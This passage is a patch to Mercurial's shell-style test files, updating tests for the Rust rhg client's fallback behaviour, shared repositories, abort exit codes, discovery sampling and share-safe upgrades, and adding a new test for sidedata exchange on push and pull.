$NO_FALLBACK rhg debugdata -c 2 8d0267cb034247ebfa5ee58ce59e22e57a492297 test 0 0 file-3 Commit 3 (no-eol) - $ rhg debugdata -m 2 + $ $NO_FALLBACK rhg debugdata -m 2 file-1\x00b8e02f6433738021a065f94175c7cd23db5f05be (esc) file-2\x005d9299349fc01ddd25d0070d149b124d8f10411e (esc) file-3\x002661d26c649684b482d10f91960cc3db683c38b4 (esc) Debuging with full node id - $ rhg debugdata -c `hg log -r 0 -T '{node}'` + $ $NO_FALLBACK rhg debugdata -c `hg log -r 0 -T '{node}'` d1d1c679d3053e8926061b6f45ca52009f011e3f test 0 0 @@ -108,16 +115,16 @@ cf8b83f14ead62b374b6e91a0e9303b85dfd9ed7 91c6f6e73e39318534dc415ea4e8a09c99cd74d6 6ae9681c6d30389694d8701faf24b583cf3ccafe - $ rhg files -r cf8b83 + $ $NO_FALLBACK rhg files -r cf8b83 file-1 file-2 file-3 - $ rhg cat -r cf8b83 file-2 + $ $NO_FALLBACK rhg cat -r cf8b83 file-2 2 - $ rhg cat -r c file-2 - abort: ambiguous revision identifier c + $ $NO_FALLBACK rhg cat -r c file-2 + abort: ambiguous revision identifier: c [255] - $ rhg cat -r d file-2 + $ $NO_FALLBACK rhg cat -r d file-2 2 Cat files @@ -128,50 +135,77 @@ $ echo "original content" > original $ hg add original $ hg commit -m "add original" original - $ rhg cat -r 0 original + $ $NO_FALLBACK rhg cat -r 0 original original content Cat copied file should not display copy metadata $ hg copy original copy_of_original $ hg commit -m "add copy of original" - $ rhg cat -r 1 copy_of_original + $ $NO_FALLBACK rhg cat -r 1 copy_of_original + original content + +Fallback to Python + $ $NO_FALLBACK rhg cat original + unsupported feature: `rhg cat` without `--rev` / `-r` + [252] + $ rhg cat original original content + $ FALLBACK_EXE="$RHG_FALLBACK_EXECUTABLE" + $ unset RHG_FALLBACK_EXECUTABLE + $ rhg cat original + abort: 'rhg.on-unsupported=fallback' without 'rhg.fallback-executable' set. 
+ [255] + $ RHG_FALLBACK_EXECUTABLE="$FALLBACK_EXE" + $ export RHG_FALLBACK_EXECUTABLE + + $ rhg cat original --config rhg.fallback-executable=false + [1] + + $ rhg cat original --config rhg.fallback-executable=hg-non-existent + tried to fall back to a 'hg-non-existent' sub-process but got error $ENOENT$ + unsupported feature: `rhg cat` without `--rev` / `-r` + [252] + + $ rhg cat original --config rhg.fallback-executable=rhg + Blocking recursive fallback. The 'rhg.fallback-executable = rhg' config points to `rhg` itself. + unsupported feature: `rhg cat` without `--rev` / `-r` + [252] + Requirements - $ rhg debugrequirements + $ $NO_FALLBACK rhg debugrequirements dotencode fncache generaldelta + persistent-nodemap + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store $ echo indoor-pool >> .hg/requires - $ rhg files + $ $NO_FALLBACK rhg files + unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] - $ rhg cat -r 1 copy_of_original + $ $NO_FALLBACK rhg cat -r 1 copy_of_original + unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] - $ rhg debugrequirements - dotencode - fncache - generaldelta - revlogv1 - sparserevlog - store - indoor-pool + $ $NO_FALLBACK rhg debugrequirements + unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool + [252] $ echo -e '\xFF' >> .hg/requires - $ rhg debugrequirements - abort: .hg/requires is corrupted + $ $NO_FALLBACK rhg debugrequirements + abort: parse error in 'requires' file [255] Persistent nodemap $ cd $TESTTMP $ rm -rf repository - $ hg init repository + $ hg --config format.use-persistent-nodemap=no init repository $ cd repository - $ rhg debugrequirements | grep nodemap + $ $NO_FALLBACK rhg debugrequirements | grep nodemap [1] $ hg debugbuilddag .+5000 --overwritten-file --config "storage.revlog.nodemap.mode=warn" $ hg id -r tip @@ -179,14 +213,14 @@ $ ls .hg/store/00changelog* .hg/store/00changelog.d 
.hg/store/00changelog.i - $ rhg files -r c3ae8dec9fad + $ $NO_FALLBACK rhg files -r c3ae8dec9fad of $ cd $TESTTMP $ rm -rf repository $ hg --config format.use-persistent-nodemap=True init repository $ cd repository - $ rhg debugrequirements | grep nodemap + $ $NO_FALLBACK rhg debugrequirements | grep nodemap persistent-nodemap $ hg debugbuilddag .+5000 --overwritten-file --config "storage.revlog.nodemap.mode=warn" $ hg id -r tip @@ -198,7 +232,78 @@ .hg/store/00changelog.n Specifying revisions by changeset ID - $ rhg files -r c3ae8dec9fad + $ $NO_FALLBACK rhg files -r c3ae8dec9fad of - $ rhg cat -r c3ae8dec9fad of + $ $NO_FALLBACK rhg cat -r c3ae8dec9fad of r5000 + +Create a shared repository + + $ echo "[extensions]" >> $HGRCPATH + $ echo "share = " >> $HGRCPATH + + $ cd $TESTTMP + $ hg init repo1 + $ echo a > repo1/a + $ hg -R repo1 commit -A -m'init' + adding a + + $ hg share repo1 repo2 + updating working directory + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +And check that basic rhg commands work with sharing + + $ $NO_FALLBACK rhg files -R repo2 + repo2/a + $ $NO_FALLBACK rhg -R repo2 cat -r 0 repo2/a + a + +Same with relative sharing + + $ hg share repo2 repo3 --relative + updating working directory + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + + $ $NO_FALLBACK rhg files -R repo3 + repo3/a + $ $NO_FALLBACK rhg -R repo3 cat -r 0 repo3/a + a + +Same with share-safe + + $ echo "[format]" >> $HGRCPATH + $ echo "use-share-safe = True" >> $HGRCPATH + + $ cd $TESTTMP + $ hg init repo4 + $ cd repo4 + $ echo a > a + $ hg commit -A -m'init' + adding a + + $ cd ..
+ $ hg share repo4 repo5 + updating working directory + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +And check that basic rhg commands work with sharing + + $ cd repo5 + $ $NO_FALLBACK rhg files + a + $ $NO_FALLBACK rhg cat -r 0 a + a + +The blackbox extension is supported + + $ echo "[extensions]" >> $HGRCPATH + $ echo "blackbox =" >> $HGRCPATH + $ echo "[blackbox]" >> $HGRCPATH + $ echo "maxsize = 1" >> $HGRCPATH + $ $NO_FALLBACK rhg files > /dev/null + $ cat .hg/blackbox.log + ????/??/?? ??:??:??.??? * @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files exited 0 after 0.??? seconds (glob) + $ cat .hg/blackbox.log.1 + ????/??/?? ??:??:??.??? * @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files (glob) + diff --git a/tests/test-rollback.t b/tests/test-rollback.t --- a/tests/test-rollback.t +++ b/tests/test-rollback.t @@ -103,7 +103,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status * (glob) - [255] + [40] $ cat .hg/last-message.txt ; echo precious commit message @@ -118,7 +118,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit hook exited with status * (glob) - [255] + [40] $ cat .hg/last-message.txt another precious commit message @@ -380,7 +380,7 @@ warn during abort rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg commit -m 'commit 1' warn during pretxncommit @@ -405,7 +405,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg commit -m 'commit 1' warn during pretxncommit @@ -431,7 +431,7 @@ transaction abort! 
warn during abort abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg verify checking changesets diff --git a/tests/test-setdiscovery.t b/tests/test-setdiscovery.t --- a/tests/test-setdiscovery.t +++ b/tests/test-setdiscovery.t @@ -1328,25 +1328,25 @@ updating to branch b 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg -R a debugdiscovery b --debug --verbose --config progress.debug=true --config devel.discovery.randomize=false + $ hg -R a debugdiscovery b --debug --verbose --config progress.debug=true --config devel.discovery.randomize=false --config devel.discovery.sample-size.initial=50 comparing with b query 1; heads searching for changes taking quick initial sample searching: 2 queries - query 2; still undecided: 1080, sample size is: 100 + query 2; still undecided: 1080, sample size is: 50 sampling from both directions searching: 3 queries - query 3; still undecided: 980, sample size is: 200 + query 3; still undecided: 1030, sample size is: 200 sampling from both directions searching: 4 queries - query 4; still undecided: 497, sample size is: 210 + query 4; still undecided: 547, sample size is: 210 sampling from both directions searching: 5 queries - query 5; still undecided: 285, sample size is: 220 + query 5; still undecided: 336, sample size is: 220 sampling from both directions searching: 6 queries - query 6; still undecided: 63, sample size is: 63 + query 6; still undecided: 114, sample size is: 114 6 total queries in *.????s (glob) elapsed time: * seconds (glob) round-trips: 6 @@ -1412,22 +1412,30 @@ missing: 1040 common heads: 3ee37d65064a - $ hg -R a debugdiscovery b --debug --config devel.discovery.exchange-heads=false --config devel.discovery.randomize=false --config devel.discovery.grow-sample.rate=1.01 + $ hg -R a debugdiscovery b --debug --config devel.discovery.exchange-heads=false --config devel.discovery.randomize=false --config devel.discovery.grow-sample.rate=1.20 --config 
devel.discovery.sample-size=50 comparing with b searching for changes sampling from both directions - query 1; still undecided: 1340, sample size is: 200 + query 1; still undecided: 1340, sample size is: 50 + sampling from both directions + query 2; still undecided: 995, sample size is: 60 sampling from both directions - query 2; still undecided: 795, sample size is: 202 + query 3; still undecided: 913, sample size is: 72 sampling from both directions - query 3; still undecided: 525, sample size is: 204 + query 4; still undecided: 816, sample size is: 204 + sampling from both directions + query 5; still undecided: 612, sample size is: 153 sampling from both directions - query 4; still undecided: 252, sample size is: 206 + query 6; still undecided: 456, sample size is: 123 + sampling from both directions + query 7; still undecided: 332, sample size is: 147 sampling from both directions - query 5; still undecided: 44, sample size is: 44 - 5 total queries in *s (glob) - elapsed time: * seconds (glob) - round-trips: 5 + query 8; still undecided: 184, sample size is: 176 + sampling from both directions + query 9; still undecided: 8, sample size is: 8 + 9 total queries in *s (glob) + elapsed time: * seconds (glob) + round-trips: 9 heads summary: total common heads: 1 also local heads: 0 @@ -1580,3 +1588,175 @@ common: 0 missing: 1 common heads: 66f7d451a68b + + $ cd .. 
+ + +Test debuging discovery using different subset of the same repository +===================================================================== + +remote is a local subset +------------------------ + +remote will be last 25 heads of the local graph + + $ cd $TESTTMP/manyheads + $ hg -R a debugdiscovery \ + > --debug \ + > --remote-as-revs 'last(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + query 1; heads + searching for changes + all remote heads known locally + elapsed time: * seconds (glob) + round-trips: 1 + heads summary: + total common heads: 25 + also local heads: 25 + also remote heads: 25 + both: 25 + local heads: 260 + common: 25 + missing: 235 + remote heads: 25 + common: 25 + unknown: 0 + local changesets: 1340 + common: 400 + heads: 25 + roots: 1 + missing: 940 + heads: 235 + roots: 235 + first undecided set: 940 + heads: 235 + roots: 235 + common: 0 + missing: 940 + common heads: 0dfd965d91c6 0fe09b60448d 14a17233ce9d 175c0a3072cf 1c51e2c80832 1e51600e0698 24eb5f9bdbab 25ce09526613 36bd00abde57 426989fdefa0 596d87362679 5dd1039ea5c0 5ef24f022278 5f230dc19419 80b39998accb 88f40688ffb5 9e37ddf8c632 abf4d55b075e b2ce801fddfe b368b6ac3ce3 c959bf2e869c c9fba6ba4e2e d783207cf649 d9a51e256f21 e3717a4e3753 + +local is a local subset +------------------------ + +remote will be last 25 heads of the local graph + + $ cd $TESTTMP/manyheads + $ hg -R a debugdiscovery b \ + > --debug \ + > --local-as-revs 'first(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + comparing with b + query 1; heads + searching for changes + taking quick initial sample + query 2; still undecided: 375, sample size is: 81 + sampling from both directions + query 3; still undecided: 3, sample size is: 3 + 3 total queries *s (glob) + elapsed time: * seconds (glob) + round-trips: 3 + heads summary: + total common heads: 1 + also local heads: 0 + also remote heads: 0 + both: 0 + local heads: 25 + common: 0 + missing: 25 + remote heads: 1 + common: 0 + 
unknown: 1 + local changesets: 400 + common: 300 + heads: 1 + roots: 1 + missing: 100 + heads: 25 + roots: 25 + first undecided set: 400 + heads: 25 + roots: 1 + common: 300 + missing: 100 + common heads: 3ee37d65064a + +both local and remove are subset +------------------------ + +remote will be last 25 heads of the local graph + + $ cd $TESTTMP/manyheads + $ hg -R a debugdiscovery \ + > --debug \ + > --local-as-revs 'first(heads(all()), 25)' \ + > --remote-as-revs 'last(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + query 1; heads + searching for changes + taking quick initial sample + query 2; still undecided: 375, sample size is: 81 + sampling from both directions + query 3; still undecided: 3, sample size is: 3 + 3 total queries in *s (glob) + elapsed time: * seconds (glob) + round-trips: 3 + heads summary: + total common heads: 1 + also local heads: 0 + also remote heads: 0 + both: 0 + local heads: 25 + common: 0 + missing: 25 + remote heads: 25 + common: 0 + unknown: 25 + local changesets: 400 + common: 300 + heads: 1 + roots: 1 + missing: 100 + heads: 25 + roots: 25 + first undecided set: 400 + heads: 25 + roots: 1 + common: 300 + missing: 100 + common heads: 3ee37d65064a + +Test -T json output +------------------- + + $ hg -R a debugdiscovery \ + > -T json \ + > --debug \ + > --local-as-revs 'first(heads(all()), 25)' \ + > --remote-as-revs 'last(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + [ + { + "elapsed": *, (glob) + "nb-common-heads": 1, + "nb-common-heads-both": 0, + "nb-common-heads-local": 0, + "nb-common-heads-remote": 0, + "nb-common-roots": 1, + "nb-head-local": 25, + "nb-head-local-missing": 25, + "nb-head-remote": 25, + "nb-head-remote-unknown": 25, + "nb-ini_und": 400, + "nb-ini_und-common": 300, + "nb-ini_und-heads": 25, + "nb-ini_und-missing": 100, + "nb-ini_und-roots": 1, + "nb-missing-heads": 25, + "nb-missing-roots": 25, + "nb-revs": 400, + "nb-revs-common": 300, + "nb-revs-missing": 100, + 
"output": "query 1; heads\nsearching for changes\ntaking quick initial sample\nquery 2; still undecided: 375, sample size is: 81\nsampling from both directions\nquery 3; still undecided: 3, sample size is: 3\n3 total queries in *s\n", (glob) + "total-roundtrips": 3 + } + ] diff --git a/tests/test-share-bookmarks.t b/tests/test-share-bookmarks.t --- a/tests/test-share-bookmarks.t +++ b/tests/test-share-bookmarks.t @@ -102,7 +102,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ hg book bm1 FYI, in contrast to above test, bmX is invisible in repo1 (= shared @@ -127,7 +127,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ hg book bm3 clean up bm2 since it's uninteresting (not shared in the vfs case and @@ -249,7 +249,7 @@ no changes found adding remote bookmark bm3 abort: forced failure by extension - [255] + [40] $ hg boo bm1 3:b87954705719 bm4 5:92793bfc8cad diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -7,6 +7,11 @@ > use-share-safe = True > [storage] > revlog.persistent-nodemap.slow-path=allow + > # enforce zlib to ensure we can upgrade to zstd later + > [format] + > revlog-compression=zlib + > # we want to be able to enable it later + > use-persistent-nodemap=no > EOF prepare source repo @@ -352,18 +357,27 @@ - changelog - manifest - $ hg debugupgraderepo --run -q + $ hg debugupgraderepo --run upgrade will perform the following actions: requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store added: share-safe + share-safe + Upgrades a repository to share-safe format so that future shares of this repository share its requirements and configs. + processed revlogs: - all-filelogs - changelog - manifest + beginning upgrade... 
+ repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + upgrading repository requirements + removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob) repository upgraded to share safe mode, existing shares will still work in old non-safe mode. Re-share existing shares to use them in safe mode New shares will be created in safe mode. $ hg debugrequirements @@ -433,7 +447,7 @@ - changelog - manifest - $ hg debugupgraderepo -q --run + $ hg debugupgraderepo --run upgrade will perform the following actions: requirements @@ -445,6 +459,12 @@ - changelog - manifest + beginning upgrade... + repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + upgrading repository requirements + removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob) repository downgraded to not use share safe mode, existing shares will not work and needs to be reshared. 
$ hg debugrequirements diff --git a/tests/test-sidedata-exchange.t b/tests/test-sidedata-exchange.t new file mode 100644 --- /dev/null +++ b/tests/test-sidedata-exchange.t @@ -0,0 +1,473 @@ +=========================== +Tests for sidedata exchange +=========================== + +Check simple exchange behavior +============================== + +Pusher and pushed have sidedata enabled +--------------------------------------- + + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-target/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg push -r . ../sidedata-target + pushing to ../sidedata-target + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + $ hg -R ../sidedata-target debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00:' + entry-0002 size 32 + '\xa3\xee4v\x99\x85$\x9f\x1f\x8dKe\x0f\xc3\x9d-\xc9\xb5%[\x15=h\xe9\xf2O\xb5\xd9\x1f*\xff\xe5' + $ hg -R ../sidedata-target debugsidedata -m 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x81' + entry-0002 size 32 + '-bL\xc5\xa4uu"#\xac\x1b`,\xc0\xbc\x9d\xf5\xac\xf0\x1d\x89)2\xf8N\xb1\x14m\xce\xd7\xbc\xae' + $ hg -R ../sidedata-target debugsidedata a 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata 
a 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x03' + entry-0002 size 32 + '\xd9\xcd\x81UvL5C\xf1\x0f\xad\x8aH\rt17Fo\x8dU!<\x8e\xae\xfc\xd1/\x06\xd4:\x80' + $ cd .. + +Puller and pulled have sidedata enabled +--------------------------------------- + + $ rm -rf sidedata-source sidedata-target + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-target/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg pull -R ../sidedata-target ../sidedata-source + pulling from ../sidedata-source + requesting all changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + new changesets 05da661850d7:7ec8b4049447 + (run 'hg update' to get a working copy) + $ hg -R ../sidedata-target debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00:' + entry-0002 size 32 + '\xa3\xee4v\x99\x85$\x9f\x1f\x8dKe\x0f\xc3\x9d-\xc9\xb5%[\x15=h\xe9\xf2O\xb5\xd9\x1f*\xff\xe5' + $ hg -R ../sidedata-target debugsidedata -m 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x81' + entry-0002 size 32 + '-bL\xc5\xa4uu"#\xac\x1b`,\xc0\xbc\x9d\xf5\xac\xf0\x1d\x89)2\xf8N\xb1\x14m\xce\xd7\xbc\xae' + $ hg -R ../sidedata-target debugsidedata a 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata a 1 -v + 2 
sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x03' + entry-0002 size 32 + '\xd9\xcd\x81UvL5C\xf1\x0f\xad\x8aH\rt17Fo\x8dU!<\x8e\xae\xfc\xd1/\x06\xd4:\x80' + $ cd .. + +Now on to asymmetric configs. + +Pusher has sidedata enabled, pushed does not +-------------------------------------------- + + $ rm -rf sidedata-source sidedata-target + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=no + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg push -r . ../sidedata-target --traceback + pushing to ../sidedata-target + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + $ hg -R ../sidedata-target log -G + o changeset: 1:7ec8b4049447 + | tag: tip + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: other + | + o changeset: 0:05da661850d7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: initial + + + $ hg -R ../sidedata-target debugsidedata -c 0 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + $ hg -R ../sidedata-target debugsidedata -m 0 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + $ hg -R ../sidedata-target debugsidedata a 0 + $ hg -R ../sidedata-target debugsidedata a 1 -v + $ cd .. 
+ +Pulled has sidedata enabled, puller does not +-------------------------------------------- + + $ rm -rf sidedata-source sidedata-target + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=no + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg pull -R ../sidedata-target ../sidedata-source + pulling from ../sidedata-source + requesting all changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + new changesets 05da661850d7:7ec8b4049447 + (run 'hg update' to get a working copy) + $ hg -R ../sidedata-target log -G + o changeset: 1:7ec8b4049447 + | tag: tip + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: other + | + o changeset: 0:05da661850d7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: initial + + + $ hg -R ../sidedata-target debugsidedata -c 0 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + $ hg -R ../sidedata-target debugsidedata -m 0 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + $ hg -R ../sidedata-target debugsidedata a 0 + $ hg -R ../sidedata-target debugsidedata a 1 -v + $ cd .. 
+ + +Check sidedata exchange with on-the-fly generation and removal +============================================================== + +(Push) Target has strict superset of the source +----------------------------------------------- + + $ hg init source-repo --config format.exp-use-side-data=yes + $ hg init target-repo --config format.exp-use-side-data=yes + $ cat << EOF >> target-repo/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata.py + > EOF + $ cd source-repo + $ echo aaa > a + $ hg add a + $ hg commit -m a + $ echo aaa > b + $ hg add b + $ hg commit -m b + $ echo xxx >> a + $ hg commit -m aa + +No sidedata is generated in the source + $ hg debugsidedata -c 0 + +Check that sidedata capabilities are advertised + $ hg debugcapabilities ../target-repo | grep sidedata + exp-wanted-sidedata=1,2 + +We expect the client to abort the push since it's not capable of generating +what the server is asking + $ hg push -r . ../target-repo + pushing to ../target-repo + abort: cannot push: required sidedata category not supported by this client: '1' + [255] + +Add the required capabilities + $ cat << EOF >> .hg/hgrc + > [extensions] + > testsidedata2=$TESTDIR/testlib/ext-sidedata-2.py + > EOF + +We expect the target to have sidedata that was generated by the source on push + $ hg push -r . 
../target-repo + pushing to ../target-repo + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 2 files + $ cd ../target-repo + $ hg debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x006' + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ cd .. + +(Push) Difference is not subset/superset +---------------------------------------- + +Source has one in common, one missing and one more sidedata category with the +target. + + $ rm -rf source-repo target-repo + $ hg init source-repo --config format.exp-use-side-data=yes + $ cat << EOF >> source-repo/.hg/hgrc + > [extensions] + > testsidedata3=$TESTDIR/testlib/ext-sidedata-3.py + > EOF + $ hg init target-repo --config format.exp-use-side-data=yes + $ cat << EOF >> target-repo/.hg/hgrc + > [extensions] + > testsidedata4=$TESTDIR/testlib/ext-sidedata-4.py + > EOF + $ cd source-repo + $ echo aaa > a + $ hg add a + $ hg commit -m a + $ echo aaa > b + $ hg add b + $ hg commit -m b + $ echo xxx >> a + $ hg commit -m aa + +Check that sidedata capabilities are advertised + $ hg debugcapabilities . 
| grep sidedata + exp-wanted-sidedata=1,2 + $ hg debugcapabilities ../target-repo | grep sidedata + exp-wanted-sidedata=2,3 + +Sidedata is generated in the source, but only the right categories (entry-0001 and entry-0002) + $ hg debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x006' + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + + +We expect the target to have sidedata that was generated by the source on push, +and also removed the sidedata categories that are not supported by the target. +Namely, we expect entry-0002 (only exchanged) and entry-0003 (generated), +but not entry-0001. + + $ hg push -r . ../target-repo --traceback + pushing to ../target-repo + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 2 files + $ cd ../target-repo + $ hg log -G + o changeset: 2:40f977031323 + | tag: tip + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: aa + | + o changeset: 1:2707720c6597 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: b + | + o changeset: 0:7049e48789d7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: a + + $ hg debugsidedata -c 0 + 2 sidedata entries + entry-0002 size 32 + entry-0003 size 48 + $ hg debugsidedata -c 1 -v + 2 sidedata entries + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + entry-0003 size 48 + '\x87\xcf\xdfI/\xb5\xed\xeaC\xc1\xf0S\xf3X\x1c\xcc\x00m\xee\xe6#\xc1\xe3\xcaB8Fk\x82e\xfc\xc01\xf6\xb7\xb9\xb3([\xf6D\xa6\xcf\x9b\xea\x11{\x08' + $ hg debugsidedata -m 2 + 2 sidedata entries 
+ entry-0002 size 32 + entry-0003 size 48 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0002 size 32 + entry-0003 size 48 + $ cd .. + +(Pull) Target has strict superset of the source +----------------------------------------------- + + $ rm -rf source-repo target-repo + $ hg init source-repo --config format.exp-use-side-data=yes + $ hg init target-repo --config format.exp-use-side-data=yes + $ cat << EOF >> target-repo/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata.py + > EOF + $ cd source-repo + $ echo aaa > a + $ hg add a + $ hg commit -m a + $ echo aaa > b + $ hg add b + $ hg commit -m b + $ echo xxx >> a + $ hg commit -m aa + +No sidedata is generated in the source + $ hg debugsidedata -c 0 + +Check that sidedata capabilities are advertised + $ hg debugcapabilities ../target-repo | grep sidedata + exp-wanted-sidedata=1,2 + + $ cd ../target-repo + +Add the required capabilities + $ cat << EOF >> .hg/hgrc + > [extensions] + > testsidedata2=$TESTDIR/testlib/ext-sidedata-2.py + > EOF + +We expect the target to have sidedata that it generated on-the-fly during pull + $ hg pull -r . ../source-repo --traceback + pulling from ../source-repo + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 2 files + new changesets 7049e48789d7:40f977031323 + (run 'hg update' to get a working copy) + $ hg debugsidedata -c 0 --traceback + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata -c 1 -v --traceback + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x006' + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0001 